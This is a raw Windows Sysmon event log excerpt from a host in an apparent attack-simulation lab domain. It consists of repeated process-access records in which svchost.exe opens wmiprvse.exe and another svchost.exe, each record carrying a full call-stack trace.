13:58:31.820{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011712Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.820{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011711Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.820{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011710Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.695{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011709Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.695{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011708Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.695{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011707Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.695{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011706Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.695{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011705Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.695{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011704Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.695{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011703Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.695{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011702Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.695{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011701Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.695{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011700Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.695{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011699Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.695{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011698Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.695{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011697Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.695{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011696Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.680{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011695Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.680{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011694Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.680{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011693Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.680{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011692Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.680{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011691Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.680{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011690Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.680{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011689Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 